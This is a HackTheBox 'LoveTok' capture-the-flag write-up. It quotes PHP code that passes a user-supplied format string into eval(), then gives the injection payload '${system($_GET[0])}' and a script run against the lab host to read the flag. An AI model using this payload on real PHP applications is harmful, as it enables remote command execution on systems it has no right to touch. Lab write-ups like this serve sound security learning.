HackTheBox - LoveTok
The home page displays date and texts, however, clicking the Nah, that doesn't work for me. Try again! button directs me to /?format=r and the date changes.
Nothing else stands out, so i’ll download the provided source code and begin analysis
TimeController.php
1
2
3
4
5
6
7
8
9
10
<?php
class TimeController
{
public function index($router)
{
$format = isset($_GET['format']) ? $_GET['format'] : 'r';
$time = new TimeModel($format);
return $router->view('index', ['time' => $time->getTime()]);
}
}
The TimeController class retrieves the format parameter from the URL query string ($_GET['format']) if it exists, otherwise, assigns a default value of r to the variable $format.
TimeModel.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<?php
class TimeModel
{
public function __construct($format)
{
$this->format = addslashes($format);
[ $d, $h, $m, $s ] = [ rand(1, 6), rand(1, 23), rand(1, 59), rand(1, 69) ];
$this->prediction = "+${d} day +${h} hour +${m} minute +${s} second";
}
public function getTime()
{
eval('$time = date("' . $this->format . '", strtotime("' . $this->prediction . '"));');
return isset($time) ? $time : 'Something went terribly wrong';
}
}
Right off the bat, i can see that the getTime() function uses the PHP eval(). This function is very dangerous because it allows execution of string as PHP code.
Code Injection
Because user supplied format is used in the eval() function without proper sanitization, if i pass PHP code eg: ${system($_GET[0])} as the the format, the program should execute it as PHP code and i can use & to append parameter 0 (which is the system command i want to execute): 
I’ll write a python script (just because i can) 😄 and retreive the flag.
1
2
3
./HTB-LazyTok-PHP-CodeInjection.py 94.237.63.93:41900 "cat /flag*"
HTB{wh3n_********************p0pp1ng}
Thanks for reading! Happy Hacking!!!